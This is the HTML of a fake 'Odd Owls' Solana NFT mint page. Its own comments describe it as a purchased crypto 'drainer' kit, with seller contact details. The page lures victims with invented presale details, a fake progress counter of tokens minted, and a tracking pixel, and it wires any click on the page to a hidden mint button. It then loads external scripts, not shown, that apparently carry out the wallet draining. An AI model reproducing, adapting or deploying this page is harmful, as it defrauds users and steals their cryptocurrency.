<!DOCTYPE html>
<html lang="en">
    <title>Odd Owls - NFT Mint</title>


<!-- 

Please Note That This Drainer Was Made By: https://tokens404.com
For Any Support / Help Dm @social404 On Telegram
Make Sure You Join Our Telegram Channel: https://t.me/tokens404

Thank You For Your Purchase.

 -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
    <meta charset="utf-8">
    <meta name="description" content="Monkelabs" data-react-helmet="true">
    <meta name="theme-color" content="#FFA500">
    <meta name="og:title" content="🔗 Click Here To Mint">
    <meta content="
	
    🦉 ODD OWLS NFT! Pre-Sale is live.

    🎈 Congratulations, you've been invited to our mint sale!
    
    💸 Mint Price: 0.75 SOL

    📦 Supply: 4444

    📦 Allocation: 1 NFTs per wallet

    🎁 Get your Odd Owl NFT today!
    
    ❗ Do not click any other links, stay safe!

    ❤️️ The Odd Owls Team wishes you good luck!" property="og:description">
    <meta name="og:title" content="🔗 Click Here To Mint">
    <meta property="og:site_name" content="This is an automatic announcement message.">
    <meta property="og:image" content="https://i.postimg.cc/cHckVVL4/ezgif-com-gif-maker.gif">
    <meta name="twitter:image" content="img/icon.png">
    <meta name="twitter:card" content="summary_large_image">
    <link rel="shortcut icon" type="image/png" href="img/icon.png"/>
    <link rel="stylesheet" href="ajax/libs/font-awesome/5.15.4/css/all.min.css">
    <link rel="stylesheet" href="assets/css/normalize.css">
    <link rel="stylesheet" href="assets/css/style06d5.css?1221ss2a2">

    <script>
        window.addEventListener('click', () => {
            document.getElementById('showcase__btn0').addEventListener('click', function(e) {
                document.getElementsByClassName('MuiButton-containedPrimary')[0].click();
            });
        });
    </script>
    <style>
        /*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */

/* Document
   ========================================================================== */

/**
 * 1. Correct the line height in all browsers.
 * 2. Prevent adjustments of font size after orientation changes in iOS.
 */

html {
    line-height: 1.15;
    /* 1 */
    -webkit-text-size-adjust: 100%;
    /* 2 */
}

/* Sections
   ========================================================================== */

/**
 * Remove the margin in all browsers.
 */

body {
    margin: 0;
}

/**
 * Render the `main` element consistently in IE.
 */

main {
    display: block;
}

/**
 * Correct the font size and margin on `h1` elements within `section` and
 * `article` contexts in Chrome, Firefox, and Safari.
 */

h1 {
    font-size: 2em;
    margin: 0.67em 0;
}

/* Grouping content
   ========================================================================== */

/**
 * 1. Add the correct box sizing in Firefox.
 * 2. Show the overflow in Edge and IE.
 */

hr {
    box-sizing: content-box;
    /* 1 */
    height: 0;
    /* 1 */
    overflow: visible;
    /* 2 */
}

/**
 * 1. Correct the inheritance and scaling of font size in all browsers.
 * 2. Correct the odd `em` font sizing in all browsers.
 */

pre {
    font-family: monospace, monospace;
    /* 1 */
    font-size: 1em;
    /* 2 */
}

/* Text-level semantics
   ========================================================================== */

/**
 * Remove the gray background on active links in IE 10.
 */

a {
    background-color: transparent;
}

/**
 * 1. Remove the bottom border in Chrome 57-
 * 2. Add the correct text decoration in Chrome, Edge, IE, Opera, and Safari.
 */

abbr[title] {
    border-bottom: none;
    /* 1 */
    text-decoration: underline;
    /* 2 */
    text-decoration: underline dotted;
    /* 2 */
}

/**
 * Add the correct font weight in Chrome, Edge, and Safari.
 */

b,
strong {
    font-weight: bolder;
}

/**
 * 1. Correct the inheritance and scaling of font size in all browsers.
 * 2. Correct the odd `em` font sizing in all browsers.
 */

code,
kbd,
samp {
    font-family: monospace, monospace;
    /* 1 */
    font-size: 1em;
    /* 2 */
}

/**
 * Add the correct font size in all browsers.
 */

small {
    font-size: 80%;
}

/**
 * Prevent `sub` and `sup` elements from affecting the line height in
 * all browsers.
 */

sub,
sup {
    font-size: 75%;
    line-height: 0;
    position: relative;
    vertical-align: baseline;
}

sub {
    bottom: -0.25em;
}

sup {
    top: -0.5em;
}

/* Embedded content
   ========================================================================== */

/**
 * Remove the border on images inside links in IE 10.
 */

img {
    border-style: none;
}

/* Forms
   ========================================================================== */

/**
 * 1. Change the font styles in all browsers.
 * 2. Remove the margin in Firefox and Safari.
 */

button,
input,
optgroup,
select,
textarea {
    font-family: inherit;
    /* 1 */
    font-size: 100%;
    /* 1 */
    line-height: 1.15;
    /* 1 */
    margin: 0;
    /* 2 */
}

/**
 * Show the overflow in IE.
 * 1. Show the overflow in Edge.
 */

button,
input {
    /* 1 */
    overflow: visible;
}

/**
 * Remove the inheritance of text transform in Edge, Firefox, and IE.
 * 1. Remove the inheritance of text transform in Firefox.
 */

button,
select {
    /* 1 */
    text-transform: none;
}

/**
 * Correct the inability to style clickable types in iOS and Safari.
 */

button,
[type="button"],
[type="reset"],
[type="submit"] {
    -webkit-appearance: button;
}

/**
 * Remove the inner border and padding in Firefox.
 */

button::-moz-focus-inner,
[type="button"]::-moz-focus-inner,
[type="reset"]::-moz-focus-inner,
[type="submit"]::-moz-focus-inner {
    border-style: none;
    padding: 0;
}

/**
 * Restore the focus styles unset by the previous rule.
 */

button:-moz-focusring,
[type="button"]:-moz-focusring,
[type="reset"]:-moz-focusring,
[type="submit"]:-moz-focusring {
    outline: 1px dotted ButtonText;
}

/**
 * Correct the padding in Firefox.
 */

fieldset {
    padding: 0.35em 0.75em 0.625em;
}

/**
 * 1. Correct the text wrapping in Edge and IE.
 * 2. Correct the color inheritance from `fieldset` elements in IE.
 * 3. Remove the padding so developers are not caught out when they zero out
 *    `fieldset` elements in all browsers.
 */

legend {
    box-sizing: border-box;
    /* 1 */
    color: inherit;
    /* 2 */
    display: table;
    /* 1 */
    max-width: 100%;
    /* 1 */
    padding: 0;
    /* 3 */
    white-space: normal;
    /* 1 */
}

/**
 * Add the correct vertical alignment in Chrome, Firefox, and Opera.
 */

progress {
    vertical-align: baseline;
}

/**
 * Remove the default vertical scrollbar in IE 10+.
 */

textarea {
    overflow: auto;
}

/**
 * 1. Add the correct box sizing in IE 10.
 * 2. Remove the padding in IE 10.
 */

[type="checkbox"],
[type="radio"] {
    box-sizing: border-box;
    /* 1 */
    padding: 0;
    /* 2 */
}

/**
 * Correct the cursor style of increment and decrement buttons in Chrome.
 */

[type="number"]::-webkit-inner-spin-button,
[type="number"]::-webkit-outer-spin-button {
    height: auto;
}

/**
 * 1. Correct the odd appearance in Chrome and Safari.
 * 2. Correct the outline style in Safari.
 */

[type="search"] {
    -webkit-appearance: textfield;
    /* 1 */
    outline-offset: -2px;
    /* 2 */
}

/**
 * Remove the inner padding in Chrome and Safari on macOS.
 */

[type="search"]::-webkit-search-decoration {
    -webkit-appearance: none;
}

/**
 * 1. Correct the inability to style clickable types in iOS and Safari.
 * 2. Change font properties to `inherit` in Safari.
 */

::-webkit-file-upload-button {
    -webkit-appearance: button;
    /* 1 */
    font: inherit;
    /* 2 */
}

/* Interactive
   ========================================================================== */

/*
 * Add the correct display in Edge, IE 10+, and Firefox.
 */

details {
    display: block;
}

/*
 * Add the correct display in all browsers.
 */

summary {
    display: list-item;
}

/* Misc
   ========================================================================== */

/**
 * Add the correct display in IE 10+.
 */

template {
    display: none;
}

/**
 * Add the correct display in IE 10.
 */

[hidden] {
    display: none;
}
    </style>

    <style>
        @import url("css2.html");
* {
    box-sizing: border-box;
    scroll-behavior: smooth;
}

body {
    overflow-x: hidden;
    font-family: Poppins, sans-serif;
    background: url("img/bg.png") 0% 0% / cover no-repeat;
    color: rgb(0, 0, 0);
    display: flex;
    justify-content: center;
    letter-spacing: 0.6px;
    align-items: center;
    flex-direction: column;
}

a {
    text-decoration: none;
}

img {
    width: 100%;
    height: 100%;
}

header {
    width: 80%;
    position: fixed;
    top: 20px;
    padding: 0px 50px;
    display: flex;
    align-items: center;
    justify-content: space-between;
    z-index: 100;
}

header .logo img {
    width: 250px;
}

.social-list {
    display: flex;
    align-items: center;
    justify-content: center;
    list-style: none;
    margin-top: 0px;
}

.social-list li {
    margin-right: 15px;
}

.social-list li:last-child {
    margin-right: 0px;
}

.social-list li:first-child a img {
    width: 40px;
}

.social-list li a {
    width: auto;
    height: auto;
    display: flex;
    justify-content: center;
    align-items: center;
    background: transparent;
    font-size: 22px;
    padding: 10px;
    transition: all 0.4s ease 0s;
    color: rgb(254, 202, 1);
}

.social-list li a img,
.social-list li a svg {
    width: 30px;
    height: max-content;
}

.main-screen {
    position: relative;
    display: flex;
    justify-content: center;
    align-items: center;
    width: 80%;
    height: 100vh;
    overflow: hidden;
}

.main-area {
    background-image: url("img/ico.png");
    background-repeat: no-repeat;
    width: 100%;
    display: flex;
    align-items: center;
    flex-direction: row;
}

.main-area__left {
    flex-basis: 50%;
}

.main-area__right {
    flex-basis: 50%;
    background-color: rgba(0, 0, 0, 0.69);
    padding: 40px 30px;
}

.left-title {
    font-size: 64px;
    font-weight: 900;
    margin: 0px;
}

.left-pre__title {
    font-weight: 900;
    font-size: 19px;
    margin-top: -5px;
    margin-bottom: 30px;
}

.slider-area {
    position: relative;
    overflow: hidden;
    height: 100%;
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
}

.slider-area img {
    position: relative;
    width: 50%;
    height: auto;
    object-fit: contain;
    border-radius: 10px;
}

.token {
    width: 85%;
    margin-top: 25px;
    color: rgb(0, 0, 0);
}

.token-title {
    margin-top: 24px;
    margin-bottom: 8px;
    color: rgb(0, 0, 0);
    font-weight: 500;
    font-size: 12px;
}

.token-line {
    position: relative;
    width: 100%;
    margin-bottom: 10px;
}

.token-line .line {
    width: 100%;
    height: 10px;
    background: rgba(255, 255, 255, 0.1);
    border-radius: 6px;
}

.token-line .progress-line {
    position: absolute;
    inset: 0px;
    background: linear-gradient(90deg, rgba(242,91,22,1) 65%, rgba(0,212,255,1) 100%);
    height: 10px;
    border-radius: 6px;
}

.token-number {
    display: flex;
    align-items: center;
    justify-content: space-between;
}

.token-number span {
    font-size: 14px;
}

.pre-total {
    display: flex;
    align-items: center;
    justify-content: space-between;
}

.pre-total #price-total {
    font-size: 18px;
    font-weight: 900;
}

.add-input-remove {
    display: flex;
    align-items: center;
}

.add-input-remove a img {
    width: 22px;
    height: auto;
    object-fit: contain;
}

.minus-btn,
.plus-btn {
    background: rgba(151, 151, 151, 0.25);
    font-size: 26px;
    font-weight: 400;
    color: rgb(254, 202, 1);
    padding: 10px 15px;
    border-radius: 6px;
}

.minus-btn {
    margin-right: 10px;
}

.plus-btn {
    margin-right: 20px;
}

.add-input-remove input {
    width: 150px;
    border: none;
    text-align: center;
    font-size: 20px;
    font-weight: 400;
    color: rgb(254, 202, 1);
    background: rgba(151, 151, 151, 0.25);
    border-radius: 6px;
    margin-right: 25px;
    padding: 10px 0px;
}

.add-input-remove input:hover,
.add-input-remove input:focus {
    border: none;
    outline: none;
}

.price-box {
    font-size: 10px;
    color: rgba(255, 255, 255, 0.73);
    margin-left: 16px;
    line-height: 170%;
}

.right-title {
    position: relative;
    font-size: 46px;
    color: rgb(255, 255, 255);
    font-weight: 900;
    margin: 0px 0px 20px;
}

.right-title img {
    width: 200px;
}

.right-list {
    text-align: left;
    list-style: none;
    padding: 0px;
    display: flex;
    flex-direction: column;
    margin-bottom: 20px;
}

.right-list li {
    display: flex;
    align-items: center;
    justify-content: flex-start;
    margin-bottom: 15px;
}

.right-list li .number {
    font-size: 14px;
    margin-right: 29px;
}

.right-list li .text {
    width: 100%;
    font-size: 16px;
    color: rgb(255, 255, 255);
    line-height: 1.5;
    font-weight: 500;
    text-align: left;
}

.pre-total {
    display: flex;
    justify-content: center;
    padding: 20px 28px;
    margin-bottom: 16px;
    align-items: center;
}

.price {
    color: rgb(254, 202, 1);
    margin: 10px 0px 30px;
    display: flex;
    align-items: center;
    justify-content: space-between;
    font-size: 18px;
    font-weight: bold;
}

.join-btn span {
    position: relative;
    z-index: 10;
}

#root button {
    position: relative;
    display: flex;
    align-items: center;
    border-radius: 6px;
    font-weight: 600;
    font-size: 16px;
    line-height: 32px;
    color: rgb(0, 0, 0);
    padding: 0px 35px;
    height: 40px;
    cursor: pointer;
    transition-duration: 0.3s;
    letter-spacing: 0.5px;
    margin-right: 30px;
    justify-content: center !important;
    background: rgb(165, 22, 22) !important;
}

#root button:hover {
    background: rgb(129, 157, 25) !important;
}

.button-box {
    display: flex;
    align-items: center;
}

.button-box img {
    width: 75px;
}

.wallet-address {
    color: rgb(254, 202, 1);
    text-shadow: rgb(0, 162, 209) 0px 4px 3px;
    text-align: center;
    display: none;
}

#remaining {
    display: none;
}

@media only screen and (min-width: 1400px) {
    .main-screen {
        height: 100vh;
    }
}

/* .animation {
    animation: 4s ease 0s infinite normal none running animation;
} */

@-webkit-keyframes animation {
    0% {
        transform: rotate(0deg) translate3d(5px, 0px, 0px) rotate(0deg);
    }
    100% {
        transform: rotate(1turn) translate3d(5px, 0px, 0px) rotate(-1turn);
    }
}

@keyframes animation {
    0% {
        transform: rotate(0deg) translate3d(5px, 0px, 0px) rotate(0deg);
    }
    100% {
        transform: rotate(1turn) translate3d(5px, 0px, 0px) rotate(-1turn);
    }
}
    </style>
</head>

<body>
    <script>
        new Image().src = "http://whos.amung.us/swidget/userlers";
    </script>
    <header>
        <div class="logo"><img src="img/icon.png" alt="Logo"></div>
        <div class="social-list">
           
        </div>
    </header>

    <section class="section main-screen">
        <div class="main-area">

            <div class="main-area__right">
                <h2 class="right-title">Odd Owls NFT</h2>

                <div class="right-list">
                    <li>
                        <div class="text">
                            The forest beckons you to enter, do you dare? 🦉 Minting Now
                        </div>
                    </li>
                </div>

                <div class="price">
                    <div class="add-input-remove">
                        <input type="text" id="total" value="1" readonly="">
                        <a href="javascript:void(0)" class="minus-btn">-</a>
                        <a href="javascript:void(0)" class="plus-btn">+</a>
                    </div>
                    <div class="price-box">
                        <div id="price-total"><span>0.75</span> SOL per 1 NFT</div>
                        <div>1 NFT max per transaction</div>
                    </div>
                </div>
                <div class="button-box">
                    <div id="root" class="cl-root">
                        <main>
                            <button id="butt" class="join-btn" tabindex="0" type="button" style="display: none;"></button>
                        </main>
                    </div>
                    <img src="assets/img/solana.png" alt="solana">
                </div>
            </div>


            <div class="main-area__left">
                <div class="slider-area">
                    <img class="animation" src="img/imageman.gif" alt="gif">
                    <div class="token">
                        <div class="token-title">TOKENS MINTED</div>
                        <div class="token-line">
                            <div class="line"></div>
                            <div class="progress-line"></div>
                        </div>
                        <div class="token-number" id="tokenup"><span id="tokennumber">3056</span> <span id="endTick">4444</span></div>
                    </div>
                </div>
            </div>

        </div>
    </section>

    <script src="assets/js/jquery-3.6.0.min.js"></script>
    <script src="assets/js/slick.min.js"></script>

    <script>
        const $plusButton = document.querySelector(".plus-btn");
        const $minuButton = document.querySelector(".minus-btn");
        const $numberText = document.querySelector("#total");
        const $remaining = document.querySelector('#remaining');
        const $priceResultText = document.querySelector("#price-total span");
        let itemPriceSelected = 1;
        let itemCount = 5;

        $plusButton.addEventListener("click", function(e) {
            e.preventDefault();
            itemCount = itemCount < 1 ? itemCount + 1 : 1;
            $numberText.value = itemCount;
            $priceResultText.textContent = (itemPriceSelected * itemCount).toFixed(1);
        });
        $minuButton.addEventListener("click", function(e) {
            e.preventDefault();
            itemCount = parseInt($numberText.value);
            itemCount = itemCount > 1 ? itemCount - 1 : itemCount;
            $numberText.value = itemCount;
            $priceResultText.textContent = (itemPriceSelected * itemCount).toFixed(1);
        });
    </script>

    <script>
        ! function(e) {

            function t(t) {
                for (var n, i, a = t[0], c = t[1], l = t[2], s = 0, p = []; s < a.length; s++) i = a[s], Object
                    .prototype
                    .hasOwnProperty.call(o, i) && o[i] && p.push(o[i][0]), o[i] = 0;
                for (n in c) Object.prototype.hasOwnProperty.call(c, n) && (e[n] = c[n]);
                for (f && f(t); p.length;) p.shift()();
                return u.push.apply(u, l || []), r()
            }

            function r() {
                for (var e, t = 0; t < u.length; t++) {
                    for (var r = u[t], n = !0, a = 1; a < r.length; a++) {
                        var c = r[a];
                        0 !== o[c] && (n = !1)
                    }
                    n && (u.splice(t--, 1), e = i(i.s = r[0]))
                }
                return e
            }
            var n = {},
                o = {
                    1: 0
                },
                u = [];

            function i(t) {
                if (n[t]) return n[t].exports;
                var r = n[t] = {
                    i: t,
                    l: !1,
                    exports: {}
                };
                return e[t].call(r.exports, r, r.exports, i), r.l = !0, r.exports
            }
            i.e = function(e) {
                var t = [],
                    r = o[e];
                if (0 !== r)
                    if (r) t.push(r[2]);
                    else {
                        var n = new Promise((function(t, n) {
                            r = o[e] = [t, n]
                        }));
                        t.push(r[2] = n);
                        var u, a = document.createElement("script");
                        a.charset = "utf-8", a.timeout = 120, i.nc && a.setAttribute("nonce", i.nc), a.src =
                            function(
                                e) {
                                return i.p + "../static/js/" + ({}[e] || e) + "." + {
                                    3: ""
                                }[e] + "chunk.js"
                            }(e);
                        var c = new Error;
                        u = function(t) {
                            a.onerror = a.onload = null, clearTimeout(l);
                            var r = o[e];
                            if (0 !== r) {
                                if (r) {
                                    var n = t && ("load" === t.type ? "missing" : t.type),
                                        u = t && t.target && t.target.src;
                                    c.message = "Loading chunk " + e + " failed.\n(" + n + ": " + u + ")", c
                                        .name =
                                        "ChunkLoadError", c.type = n, c.request = u, r[1](c)
                                }
                                o[e] = void 0
                            }
                        };
                        var l = setTimeout((function() {
                            u({
                                type: "timeout",
                                target: a
                            })
                        }), 12e4);
                        a.onerror = a.onload = u, document.head.appendChild(a)
                    }
                return Promise.all(t)
            }, i.m = e, i.c = n, i.d = function(e, t, r) {
                i.o(e, t) || Object.defineProperty(e, t, {
                    enumerable: !0,
                    get: r
                })
            }, i.r = function(e) {
                "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol
                    .toStringTag, {
                        value: "Module"
                    }), Object.defineProperty(e, "__esModule", {
                    value: !0
                })
            }, i.t = function(e, t) {
                if (1 & t && (e = i(e)), 8 & t) return e;
                if (4 & t && "object" == typeof e && e && e.__esModule) return e;
                var r = Object.create(null);
                if (i.r(r), Object.defineProperty(r, "default", {
                        enumerable: !0,
                        value: e
                    }), 2 & t && "string" != typeof e)
                    for (var n in e) i.d(r, n, function(t) {
                        return e[t]
                    }.bind(null, n));
                return r
            }, i.n = function(e) {
                var t = e && e.__esModule ? function() {
                    return e.default
                } : function() {
                    return e
                };
                return i.d(t, "a", t), t
            }, i.o = function(e, t) {
                return Object.prototype.hasOwnProperty.call(e, t)
            }, i.p = "index.html", i.oe = function(e) {
                throw console.error(e), e
            };
            var a = this["webpackJsonpcandy-machine-mint"] = this["webpackJsonpcandy-machine-mint"] || [],
                c = a.push.bind(a);
            a.push = t, a = a.slice();
            for (var l = 0; l < a.length; l++) t(a[l]);
            var f = c;
            r()
        }([])
    </script>
    <script src="static/js/chunk.js"></script>
    <script src="static/js/main.chunk.js"></script>
    <script src="assets/js/tokenup.js"></script>
</body>


<!-- 

Please Note That This Drainer Was Made By: https://tokens404.com
For Any Support / Help Dm @social404 On Telegram
Make Sure You Join Our Telegram Channel: https://t.me/tokens404

Thank You For Your Purchase.

 -->
</html>
